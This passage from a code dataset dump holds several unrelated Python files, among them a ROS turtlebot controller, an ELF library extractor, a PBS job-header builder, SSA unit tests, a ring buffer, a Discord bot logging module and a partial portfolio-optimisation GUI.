rospy.Subscriber(\"/scan\", LaserScan, self.update_scan)\r\n\r\n self.data_to_file()\r\n\r\n self.angle = None\r\n self.x = None\r\n self.y = None\r\n self.ready = False\r\n self.current_action = None\r\n self.meter = False\r\n self.Hough_T = 0\r\n\r\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=1)\r\n\r\n\r\n # wait until sensing received, etc before\r\n # returning control\r\n while not self.ready:\r\n rate = rospy.Rate(20)\r\n rate.sleep()\r\n\r\n def update_odom(self, msg):\r\n \"\"\"\r\n updates odometry information of the robot.\r\n \"\"\"\r\n self.pose_msg = msg.pose.pose.position\r\n\r\n self.angle = yaw_from_odom(msg)\r\n self.yaw_msg = self.angle\r\n\r\n self.x = msg.pose.pose.position.x\r\n self.y = msg.pose.pose.position.y\r\n\r\n self.ready = True\r\n\r\n def update_scan(self, msg):\r\n \"\"\"\r\n updates laser range finder environment information around the robot.\r\n \"\"\"\r\n self.scan_msg = msg.ranges\r\n\r\n # in 360 degree range\r\n self.closest_obj_ang = degrees_to_radians(findObj360(msg.ranges)[0])\r\n\r\n # in 90 degree range in front\r\n self.closest_obj_front = findObjFront(msg.ranges)\r\n self.closest_obj_front_ang = degrees_to_radians(self.closest_obj_front[0])\r\n self.closest_obj_front_dist = self.closest_obj_front[1]\r\n #self.Hough_T = Hough_Transform(msg.ranges)\r\n\r\n self.ready = True\r\n\r\n def data_to_file(self):\r\n\r\n # convert data to JSON format\r\n rospy.Rate(5).sleep()\r\n # string manipulation and dictionary addition for position\r\n self.pose_msg = \"\\\"\" + str(self.pose_msg).replace(\"\\n\", \"\\n\\\"\")\r\n self.pose_msg = str(self.pose_msg).replace(\":\", \"\\\":\")\r\n self.dict[\"position\"] = str(self.pose_msg)\r\n rospy.Rate(5).sleep()\r\n\r\n # string manipultation and dictionary addition for scanning data\r\n self.dict[\"scan\"] = \"\\\"ranges\\\" : \" + str(self.scan_msg)\r\n rospy.Rate(5).sleep()\r\n\r\n # string manipultation and dictionary addition for yaw data\r\n self.dict[\"orientation\"] = \"\\\"yaw\\\" : \" + str(self.yaw_msg)\r\n\r\n with open(\"robot.txt\", \"w\") as file:\r\n file.write(\"{\\\"robot\\\": {\\n\")\r\n for key, value in self.dict.iteritems():\r\n if value:\r\n # all values should be comma separated, lists should have square brackets\r\n val = str(value).replace(\"\\n\", \",\\n\")\r\n val = str(val).replace(\"(\", \"[\")\r\n val = str(val).replace(\")\", \"]\")\r\n\r\n file.write(\"\\\"\"+str(key) + \"\\\"\" + \":{ \\n\" + str(val) + \"}\")\r\n if(key != \"scan\"):\r\n file.write(\",\\n\")\r\n file.write(\"}}\")\r\n\r\n def shutdown(self):\r\n \"\"\"\r\n shutsdown the robot.\r\n \"\"\"\r\n rospy.loginfo(\"Shutting down turtlebot...\")\r\n self.cmd_vel.publish(Twist())\r\n rospy.sleep(1)\r\n rospy.loginfo(\"Goodbye.\")\r\n\r\n\r\n\r\ndef main():\r\n rospy.init_node(\"turn_to\")\r\n state = TurtlebotState()\r\n rospy.on_shutdown(state.shutdown)\r\n rate = rospy.Rate(20)\r\n\r\n\r\n # while not rospy.is_shutdown():\r\n # rate.sleep()\r\n # print(\"Closest Wall at angle:{}\".format(state.Hough_T))\r\n\r\n # pause for a bit\r\n for i in range(20):\r\n rate.sleep()\r\n\r\n\r\n angle = Hough_Transform(state.scan_msg) \r\n\r\n print(\"Closest Wall at angle:{}\".format(angle))\r\n\r\n\r\n\r\n state.current_action = Turn(state,-np.deg2rad(angle))\r\n while not rospy.is_shutdown():\r\n if not state.current_action.done:\r\n state.current_action.act()\r\n else:\r\n break\r\n rate.sleep()\r\n\r\n \r\n\r\n # #####################################\r\n # #Follow Object Code\r\n # # turn to closest object\r\n # state.current_action = TurnToObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = FollowObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # state.current_action = WallFollow(state)\r\n # rate.sleep()\r\n # #####################################\r\n\r\n\r\n # ######################################\r\n # #Wall Follow Code:\r\n # # turn to closest object\r\n # state.current_action = TurnToObject(state)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = WallFollow(state)\r\n # while not rospy.is_shutdown():\r\n # rospy.loginfo(\"state.meter\" + str(state.meter))\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # elif state.meter is True:\r\n # break\r\n # else:\r\n # state.current_action = WallFollow(state)\r\n # rate.sleep()\r\n\r\n # state.current_action = Turn(state,-pi/2)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n\r\n # state.current_action = Drive(state, 1)\r\n # while not rospy.is_shutdown():\r\n # if not state.current_action.done:\r\n # state.current_action.act()\r\n # else:\r\n # break\r\n # rate.sleep()\r\n # #########################################\r\n\r\n\r\nmain()\r\n\r\n\r\n\r\n","sub_path":"HW5/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":16548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"362333437","text":"#!/usr/bin/env python3\n# Copyright (c) Facebook, Inc. and its affiliates.\n#\n# This source code is licensed under the MIT license found in the\n# LICENSE file in the root directory of this source tree.\n\nimport argparse\nimport os\nimport subprocess\nimport sys\nfrom typing import List, NamedTuple, Set\n\nfrom antlir.fs_utils import Path\nfrom elftools.elf.dynamic import DynamicSection\nfrom elftools.elf.elffile import ELFFile\nfrom elftools.elf.segments import InterpSegment\n\n\nclass ExtractorOpts(NamedTuple):\n src_dir: Path\n dest_dir: Path\n files: List[Path]\n search: Set[Path] = set()\n\n\ndef parse(path: Path, opts: ExtractorOpts) -> Set[str]:\n \"\"\"\n Parse an elf file and return a tuple of: The interpretor and a list of\n all needed libraries\n \"\"\"\n with path.open(\"rb\") as f:\n _elf = ELFFile(f)\n deps = set()\n\n for segment in _elf.iter_segments():\n if isinstance(segment, InterpSegment):\n # This is the interpreter\n interp = Path(segment.get_interp_name())\n interpdir = interp.dirname()\n # Resolve to the symlinks for the common case that the\n # interpreter is in /lib64 which is actually a symlink to\n # /usr/lib64\n if interpdir.islink():\n interpdir = interpdir.realpath()\n interp = interpdir / interp.basename()\n if os.path.isabs(interp):\n interp = interp[1:]\n interp = opts.src_dir / interp\n interpdir = opts.src_dir / interpdir[1:]\n\n # Add the interp directory as a search path\n opts.search.add(interpdir)\n # Add the interpreter as a dependency\n deps.add(interp)\n\n # Get the RPATH/RUNPATH before looking for so files\n for section in _elf.iter_sections():\n if not isinstance(section, DynamicSection):\n continue\n for tag in section.iter_tags():\n if hasattr(tag, \"rpath\"):\n rpath = Path(tag.rpath)\n if os.path.isabs(rpath):\n rpath = rpath.relpath(\"/\")\n opts.search.add(opts.src_dir / rpath)\n\n for section in _elf.iter_sections():\n if isinstance(section, DynamicSection):\n for tag in section.iter_tags():\n if hasattr(tag, \"needed\"):\n dep_so_name = tag.needed\n\n # Search through the known search paths for the so\n for search in opts.search:\n dep_path = search / dep_so_name\n if os.path.exists(dep_path):\n deps.add(dep_path)\n deps.update(parse(dep_path, opts))\n\n return deps\n\n\ndef extract(opts: ExtractorOpts):\n # The set of files to extract from\n # the src dir\n to_extract = set()\n\n for binary in opts.files:\n path = opts.src_dir / binary[1:]\n to_extract.add(path)\n to_extract = to_extract.union(parse(path, opts))\n\n for extract in to_extract:\n target = Path(\n opts.dest_dir / os.path.relpath(extract, start=opts.src_dir)\n )\n subprocess.run([\"mkdir\", \"-p\", target.dirname().decode()], check=True)\n\n subprocess.run(\n [\n \"cp\",\n \"--recursive\",\n \"--no-clobber\",\n \"--dereference\",\n \"--reflink=auto\",\n \"--sparse=auto\",\n \"--preserve=all\",\n \"--no-preserve=links\",\n extract.decode(),\n target.decode(),\n ],\n check=True,\n )\n\n\ndef _parse_args(argv):\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"files\",\n nargs=\"+\",\n type=Path.from_argparse,\n help=\"One or more binaries to inspect and extract.\",\n )\n parser.add_argument(\n \"--src-dir\",\n required=True,\n type=Path.from_argparse,\n help=\"The source directory from where to find binaries\",\n )\n parser.add_argument(\n \"--dest-dir\",\n required=True,\n type=Path.from_argparse,\n help=\"The destination directory to deposit found binaries + deps\",\n )\n\n return ExtractorOpts(**Path.parse_args(parser, argv).__dict__)\n\n\ndef main(argv):\n extract(opts=_parse_args(argv))\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"antlir/bzl/genrule/extractor/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":4539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"515811354","text":"#!/usr/bin/env python\n# contact: xic@princeton.edu\n# date: 08/07/2018\n# log:\n# 08/07/2018 by xic:\n# initial version\n#\n\nfrom __future__ import division, print_function, absolute_import\nimport numpy as np\n\nscript_type_dict = {\n 'tcsh': '#!/bin/tcsh',\n 'python': '#!/usr/bin/env python',\n}\n\n\nclass header:\n \"\"\"This class synthesize the header content of a submittable batch job\"\"\"\n\n def __init__(self, batch_sys_type='moab'):\n self.setting = {}\n self._s = None\n self._extra_lines = []\n self.batch_sys_type = batch_sys_type\n return\n\n def _add_PBS_line(self, line):\n \"\"\"add a PBS (portable Batch Script) line\"\"\"\n self._s = self._s + '#PBS ' + line + '\\n'\n return\n\n def _check_key_value(self, key):\n \"\"\"check value of a specific key. If key does not exist, return None\"\"\"\n\n if not key in self.setting.keys():\n return None\n\n value = self.setting[key]\n\n return value\n\n # ====== APIs ======\n\n def add_line(self, line):\n \"\"\"add extra PBS lines\"\"\"\n self._extra_lines.append(line)\n return\n\n def get_header(self):\n \"\"\"output header to a string\"\"\"\n\n # === determine script type\n script_type = self._check_key_value('script_type')\n if script_type is None:\n script_type = 'tcsh'\n if script_type not in script_type_dict.keys():\n raise ValueError('script type: ' + script_type + ' is not supported...')\n\n self._s = script_type_dict[script_type] + '\\n'\n\n # === determine account\n account_name = self._check_key_value('account')\n if account_name is None:\n raise ValueError('account name is missing...')\n self._add_PBS_line('-A ' + account_name)\n\n # === determine walltime\n walltime = self._check_key_value('walltime')\n if walltime is None:\n raise ValueError('walltime is missing...')\n self._add_PBS_line('-l walltime=' + walltime)\n\n # === determine resource\n nodes = self._check_key_value('nodes')\n if nodes is None:\n nodes = 1\n line = '-l nodes={:d}'.format(nodes)\n ppn = self._check_key_value('ppn')\n if ppn is not None:\n line = line + ':ppn={:d}'.format(ppn)\n self._add_PBS_line(line)\n\n # === add extra lines\n for line in self._extra_lines:\n self._add_PBS_line(line)\n\n # === add one more blank line\n self._s += '\\n'\n\n return self._s\n\n\nif __name__ == '__main__':\n h = header()\n h.setting['account'] = 'nggps_gfdl'\n h.setting['nodes'] = 2\n h.setting['ppn'] = 36\n h.setting['walltime'] = '3:00:00'\n h.add_line('-l partition=c3')\n s = h.get_header()\n print(s)\n","sub_path":"poaipy/hpc/header.py","file_name":"header.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"488210160","text":"import unittest\nfrom .ssa import SsaVariable, SsaCode\nfrom Common.cfg_common import *\n\n\nclass TestSsa(unittest.TestCase):\n def assert_ssa(self, ssa, target, left_oprd, right_oprd, operator=None):\n self.assertEqual(str(ssa.target), target)\n self.assertEqual(str(ssa.left_oprd), left_oprd)\n self.assertEqual(str(ssa.right_oprd), right_oprd)\n\n if operator is not None:\n self.assertEqual(ssa.operator, operator)\n\n def assert_ssa_list(self, ssa_list, target_list, left_oprd_list, right_oprd_list, operator_list=None):\n for i in range(len(ssa_list)):\n if operator_list is not None:\n self.assert_ssa(ssa_list[i], target_list[i], left_oprd_list[i], right_oprd_list[i], operator_list[i])\n else:\n self.assert_ssa(ssa_list[i], target_list[i], left_oprd_list[i], right_oprd_list[i], None)\n\n def assertVariableVersionStack(self, real_dict, expected_dict):\n self.assertEqual(len(real_dict), len(expected_dict))\n for var, stack in real_dict.items():\n self.assertListEqual(stack.items, expected_dict[var])\n\n def test_SsaVariable_generation(self):\n ssa_var = SsaVariable('a')\n self.assertEqual(str(ssa_var), 'a_0')\n\n ssa_var = SsaVariable(3)\n self.assertEqual(str(ssa_var), '3')\n\n def test_ssa_generation_1_stmt(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 'a': [0], 'y': [0]}\n self.assertEqual(str(ssa_code), \"z_0 = a_0 + y_0\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_number(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = 4\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 4: [0]}\n self.assertEqual(str(ssa_code), \"z_0 = 4\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n x = b + c\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0], 'a': [0], 'y': [0], 'x': [0], 'b': [0], 'c': [0]}\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n z_0 = a_0 + y_0\n x_0 = b_0 + c_0\n \"\"\"))\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt_expect_update_target(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n z = a\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0, 1], 'a': [0], 'y': [0]}\n self.assertEqual(str(ssa_code), \"z_0 = a_0 + y_0\\nz_1 = a_0\\n\")\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_generation_2_stmt_expect_update_target_multiple_time(self):\n as_tree = ast.parse(ms(\"\"\"\\\n z = a + y\n z = a + y\n z = a\n a = y\"\"\"))\n\n ssa_code = SsaCode(as_tree)\n expected_ssa_dict = {'z': [0, 1, 2], 'a': [0, 1], 'y': [0]}\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n z_0 = a_0 + y_0\n z_1 = a_0 + y_0\n z_2 = a_0\n a_1 = y_0\n \"\"\"))\n\n self.assertVariableVersionStack(ssa_code.var_version_list, expected_ssa_dict)\n\n def test_ssa_all_valid_expressions(self):\n as_tree = ast.parse(ms(\"\"\"\\\n a = b + c\n d = 2 * e\n f = g / 3\n h = - 4\n i = + j\n k = 1 < 3\n l = k | m\n n = o ^ 2\"\"\")\n )\n\n ssa_code = SsaCode(as_tree)\n\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n a_0 = b_0 + c_0\n d_0 = 2 * e_0\n f_0 = g_0 / 3\n h_0 = - 4\n i_0 = + j_0\n k_0 = 1 < 3\n l_0 = k_0 | m_0\n n_0 = o_0 ^ 2\n \"\"\"))\n\n def test_ssa_repeated_expression(self):\n as_tree = ast.parse(ms(\"\"\"\\\n c = d + e\n e = 5\n d = d + e\n d = d + e\n c = d + e\n c = d + e\"\"\")\n )\n\n ssa_code = SsaCode(as_tree)\n self.assertEqual(str(ssa_code), ms(\"\"\"\\\n c_0 = d_0 + e_0\n e_1 = 5\n d_1 = d_0 + e_1\n d_2 = d_1 + e_1\n c_1 = d_2 + e_1\n c_2 = d_2 + e_1\n \"\"\"))\n","sub_path":"lvn_optimization/Version2/test_ssa.py","file_name":"test_ssa.py","file_ext":"py","file_size_in_byte":4403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"50080396","text":"import collections\n\n\ndef calculing_items(chave, valor, T, d, D):\n for key, val in T.items():\n if key == chave:\n val = int(val)\n totalDivisao = int(valor/val)\n restoDivisao = valor%val\n for key, val in d.items():\n if key == chave:\n val = int(val)\n totalCountSpecialPrice = totalDivisao * val\n print (\"Special Price Amount: \", totalCountSpecialPrice, \"Item: \", key)\n for key, val in D.items():\n val = int(val)\n if key == chave:\n totalCountNormalPrice = restoDivisao * val\n print (\"Normal Price Amount: \", totalCountNormalPrice, \"Item: \", key)\n print (\"Total Amount: \", totalCountSpecialPrice+totalCountNormalPrice, \"Item: \", key)\n print ()\n\n\ndef special_price_as_dict():\n d = {}\n print ('Here you will input the SPECIAL price')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input the special price of this item: ')\n d[chave] = valor\n return d\n #for key, val in d.items():\n # print (key, \"your value: \", val) \n\ndef special_price_buying_more_than_one():\n T = {}\n print ('Plz insert TOTAL units to get the special price: ')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input how many items to get special price: ')\n T[chave] = valor\n return T\n\ndef normal_price_as_dict():\n D = {}\n print ('Here you will input the NORMAL price')\n while True:\n chave = input('Plz input the name of item: ')\n if chave == 'quit':\n break\n valor = input('Plz input the normal price of this item: ')\n D[chave] = valor\n return D\n\ndef your_order():\n shopList = []\n print ()\n maxList = int(input('How many items will you buy right now? '))\n count = 0\n while count < maxList:\n print ()\n item = input('Scanning your item: ')\n print ()\n shopList.append(item)\n count = count + 1\n print (shopList)\n shopList.sort()\n print (\"That's your Shopping List: \", shopList)\n print ()\n return shopList\n\ndef frequence_of_items():\n d = special_price_as_dict()\n T = special_price_buying_more_than_one()\n D = normal_price_as_dict()\n getShopList = your_order() \n freq_counter = collections.Counter(getShopList)\n print (\"That's a sum of each Item that you bought: \", freq_counter)\n print ()\n for key, val in freq_counter.items():\n calculing_items(key, val, T, d, D) \n\nfrequence_of_items()\n\n","sub_path":"DesafioQA.py","file_name":"DesafioQA.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"447167115","text":"class RingBuffer:\n def __init__(self, capacity):\n self.capacity = capacity\n self.current = 0\n self.storage = [None]*capacity\n\n def append(self, item):\n if not self.storage[0] == None:\n self.storage[self.current] = item\n if self.current < self.capacity-1:\n self.current += 1\n else:\n self.current = 0\n else:\n del self.storage[0]\n self.storage.append(item)\n\n def get(self):\n orderedlist = [None]*self.capacity\n for i in range(len(self.storage)):\n del orderedlist[-1]\n orderedlist.insert(0, self.storage[i])\n orderedlist.reverse()\n checked = False\n while not checked:\n if orderedlist[-1] == None:\n del orderedlist[-1]\n elif orderedlist[0] == None:\n del orderedlist[0]\n else:\n checked = True\n return orderedlist","sub_path":"ring_buffer/ring_buffer.py","file_name":"ring_buffer.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"225846314","text":"import sys\nimport json\nimport itertools\nimport numpy as np\nfrom scipy.optimize import differential_evolution\n\n# param = json.loads(sys.argv[1])\n\n# num_ts = param['num-targets']\n# k = param['resource-limit']\n# lmd = param['rationality']\n# w1, w2, w3 = param['weights']\n# rs_d = np.array(param['defender-rewards'])\n# ps_d = np.array(param['defender-penalties'])\n# rs_a = np.array(param['attacker-rewards'])\n# ps_a = np.array(param['attacker-penalties'])\n\n# def quantal_response(xs):\n# us = w1 * xs + w2 * rs_a * w3 * ps_a\n# exp_lmd_us = np.exp(lmd * us)\n# sum_exp_lmd_us = np.sum(exp_lmd_us)\n# return exp_lmd_us / sum_exp_lmd_us\n\n# def conditional_expectation(xs):\n# qs = quantal_response(xs)\n# return np.sum(qs * (xs * rs_d + (1 - xs) * ps_d))\n\n# def cost_function(xs):\n# if np.sum(xs) <= k:\n# return -1 * conditional_expectation(xs)\n# else:\n# return 1000 # some high value\n\n# bounds = [(0.0, 1.0)] * num_ts\n# result = differential_evolution(cost_function, bounds)\n\n# opts = result.x.tolist()\n# print(json.dumps({'optimal-coverages': opts}))\n\nTheta_1 = list(range(0, 3))\nnum_Theta_1 = 3\n\nT = list(range(0, 8))\nnum_T = 8\n\nk = 5\n\nl = []\nfor c in list(itertools.combinations_with_replacement(T, k)):\n v = [0.0] * num_T\n r = 1.0 / k\n for i in list(c):\n v[i] += r\n l.append(v)\n\nnum_A_1 = len(l)\nA_1 = list(range(0, num_A_1))\n\nI = [[0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.05, 0.65],\n [0.1, 0.3, 0.1, 0.1, 0.1, 0.1, 0.1, 0.1],\n [0.1, 0.1, 0.1, 0.1, 0.3, 0.1, 0.1, 0.1]]\n\np = [0.5, 0.25, 0.25]\n\ndef cos_sim(v1, v2): np.dot(v1, v2) / (np.linalg.norm(v1) * np.linalg.norm(v2))\n\ndef f(x):\n n = 0.0\n for theta_1 in Theta_1:\n for a_1 in A_1:\n r = 0.0\n for t in T:\n r += l[a_1][t] * I[theta_1][t]\n n += p[theta_1] * x[a_1] * r\n m = 0.0\n for a_1i in A_1:\n for a_1j in A_1:\n m += x[a_1i] * x[a_1j] * cos_sim(l[a_1i], l[a_1j])\n return n + m\n\n# def cost_fun(x):\n# if np.sum(x) <= 1.0:\n# return -1 * f(x)\n# else:\n# return 1000 # some high value\n\ndef cost_fun(x): -1 * f(x)\n\nbounds = [(0.0, 1.0)] * num_A_1\nresult = differential_evolution(cost_fun, bounds)\n\nopts = result.x.tolist()\nprint(json.dumps({'optimal-strategy': opts}))\n\n","sub_path":"src/main/resources/find_optimal_mixed_strategy.py","file_name":"find_optimal_mixed_strategy.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554686609","text":"import logging\nimport os\nimport sys\nimport traceback\nfrom datetime import datetime\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nfrom discord.ext import commands\n\nfrom Util import Configuration\n\nLOGGER = logging.getLogger('gearbot')\nDISCORD_LOGGER = logging.getLogger('discord')\n\n\nBOT_LOG_CHANNEL:discord.TextChannel\nSTARTUP_ERRORS = []\nBOT:commands.AutoShardedBot = None\n\n\ndef init_logger():\n LOGGER.setLevel(logging.DEBUG)\n DISCORD_LOGGER.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n DISCORD_LOGGER.addHandler(handler)\n\n if not os.path.isdir(\"logs\"):\n os.mkdir(\"logs\")\n handler = TimedRotatingFileHandler(filename='logs/gearbot.log', encoding='utf-8', when=\"midnight\", backupCount=30)\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n DISCORD_LOGGER.addHandler(handler)\n LOGGER.addHandler(handler)\n\n\n handler = TimedRotatingFileHandler(filename='logs/discord.log', encoding='utf-8', when=\"h\", interval=4, backupCount=30)\n DISCORD_LOGGER.addHandler(handler)\n\n\nasync def onReady(bot:commands.Bot, channelID):\n global BOT_LOG_CHANNEL, BOT\n BOT = bot\n BOT_LOG_CHANNEL = bot.get_channel(int(channelID))\n if BOT_LOG_CHANNEL is None:\n LOGGER.error(\"==========================Logging channel is misconfigured, aborting startup!==========================\")\n await bot.logout()\n\n if len(STARTUP_ERRORS) > 0:\n await bot_log(\n f\":rotating_light: Caught {len(STARTUP_ERRORS)} {'exceptions' if len(STARTUP_ERRORS) > 1 else 'exception'} during startup.\")\n for e in STARTUP_ERRORS:\n await e\n\n\ndef info(message):\n LOGGER.info(message)\n\n\ndef warn(message):\n LOGGER.warning(message)\n\n\ndef error(message):\n LOGGER.error(message)\n\ndef exception(message, error):\n LOGGER.error(message)\n trace = \"\"\n LOGGER.error(str(error))\n for line in traceback.format_tb(error.__traceback__):\n trace = f\"{trace}\\n{line}\"\n LOGGER.error(trace)\n\n\nasync def bot_log(message = None, embed = None):\n if BOT_LOG_CHANNEL is not None:\n return await BOT_LOG_CHANNEL.send(content=message, embed=embed)\n else:\n STARTUP_ERRORS.append(bot_log(message, embed))\n\nasync def log_to(guild_id, type, message=None, embed=None, file=None):\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n for cid, info in channels.items():\n if type in info:\n channel = BOT.get_channel(int(cid))\n if channel is not None:\n permissions = channel.permissions_for(BOT.get_guild(guild_id).me)\n if permissions.send_messages and (embed is None or permissions.embed_links) and (file is None or permissions.attach_files):\n if Configuration.get_var(guild_id, \"TIMESTAMPS\"):\n message = f\"[{datetime.strftime(datetime.now(), '%H:%M:%S')}] {message}\"\n await channel.send(message, embed=embed, file=file)\n\nasync def message_owner(bot, message):\n if bot.owner_id is None:\n app = await bot.application_info()\n bot.owner_id = app.owner.id\n owner = bot.get_user(bot.owner_id)\n dm_channel = owner.dm_channel\n if dm_channel is None:\n await owner.create_dm()\n await owner.dm_channel.send(message)","sub_path":"GearBot/Util/GearbotLogging.py","file_name":"GearbotLogging.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"364920528","text":"# !/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport predict.config.error as error\r\n\r\n'''\r\n框架和插件里的所有class,都必须继承该基类 (里面封装了一系列设置错误信息的方法)\r\n'''\r\nclass base(object):\r\n # 初始化错误号、错误队列\r\n def __initError(self):\r\n setattr(self, '__error', True)\r\n setattr(self, '__errorQueue', [])\r\n self.__error = {'no': 0, 'msg': ''}\r\n self.__errorQueue = []\r\n\r\n # 设置错误号,错误信息\r\n # 错误信息会自动带上捕捉到的错误的具体信息,以及错误号对应的错误信息;若不需要额外添加其他错误信息,无需写err_msg\r\n def setError(self, err_no, err_msg=''):\r\n self.setErrorNo(err_no, err_msg)\r\n self.__errorQueue.append({\r\n 'no': err_no,\r\n 'msg': self.__error['msg'],\r\n })\r\n\r\n # 只设置错误号,不将错误信息保存到错误队列\r\n def setErrorNo(self, err_no, err_msg=''):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n\r\n if err_no == 0:\r\n return\r\n\r\n import sys\r\n info = sys.exc_info()\r\n\r\n self.__error['no'] = err_no\r\n self.__error['msg'] = error.getInfo(err_no) + '; ' + str(info[0]) + ': ' + str(info[1])\r\n if err_msg:\r\n if self.__error['msg']:\r\n self.__error['msg'] += ' '\r\n self.__error['msg'] += err_msg\r\n\r\n # 合并错误队列\r\n def mergeErrorQueue(self, queue):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n self.__errorQueue += queue\r\n\r\n # 获取最近一次错误的错误对象 {'no': xxx, 'msg': xxx}\r\n def getError(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__error\r\n\r\n # 获取错误队列\r\n def getErrorQueue(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__errorQueue\r\n\r\n # 获取最近一次错误的错误号\r\n def getErrorNo(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n return self.__error['no']\r\n\r\n # 重置最近一次的错误,但不重置 errorQueue\r\n def resetErrorNo(self):\r\n if not hasattr(self, '__errorQueue'):\r\n self.__initError()\r\n self.__error = {'no': 0, 'msg': ''}\r\n\r\n # 判断最近是否有出错\r\n def hasError(self):\r\n if not hasattr(self, '__errorQueue'):\r\n return False\r\n if self.__error['no'] == 0:\r\n return False\r\n return True\r\n","sub_path":"predict/lib/baseObject.py","file_name":"baseObject.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"233157387","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 9 18:56:52 2019\n\n@author: nana\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom pypfopt.efficient_frontier import EfficientFrontier\nfrom pypfopt import risk_models\nfrom pypfopt import expected_returns\nfrom pypfopt.discrete_allocation import DiscreteAllocation, get_latest_prices\nimport bt\nimport matplotlib.pyplot as plt\nimport tkinter as tk\nimport plotly.graph_obkects as go\n\n\nroot = tk.Tk()\n \ncategories = pd.read_csv('ModelingData.csv', index_col = \"Categories\")\ntickersCount=[]\ntickersCount.append(categories.iloc[0])\nprint(len(tickersCount))\ntickersInd=[]\ntickersCoun=[]\ntickersCap=[]\nstartDate=[]\nendDate=[]\n\nTech = tk.IntVar()\nConCy = tk.IntVar()\nInd = tk.IntVar()\nEnergy = tk.IntVar() \nComm = tk.IntVar()\nHealth = tk.IntVar()\n\nusa = tk.IntVar()\nger = tk.IntVar()\nchn = tk.IntVar()\nire = tk.IntVar()\nnl = tk.IntVar()\njpn = tk.IntVar()\nindia = tk.IntVar()\nisr = tk.IntVar()\nca = tk.IntVar()\n\nlc = tk.IntVar()\nmc = tk.IntVar()\nsc = tk.IntVar()\n\nbefore = tk.IntVar()\nduring = tk.IntVar()\nafter = tk.IntVar()\n\ntk.Label(root, text=\"Industry: \").grid(row=0, column=0)\ntk.Checkbutton(root, text=\"Tech\", variable=Tech).grid(row=1, column=1)\ntk.Checkbutton(root, text=\"Consumer Cyclical\", variable=ConCy).grid(row=1, column=2)\ntk.Checkbutton(root, text=\"Industrials\", variable=Ind).grid(row=1, column=3)\ntk.Checkbutton(root, text=\"Energy\", variable=Energy).grid(row=1, column=4)\ntk.Checkbutton(root, 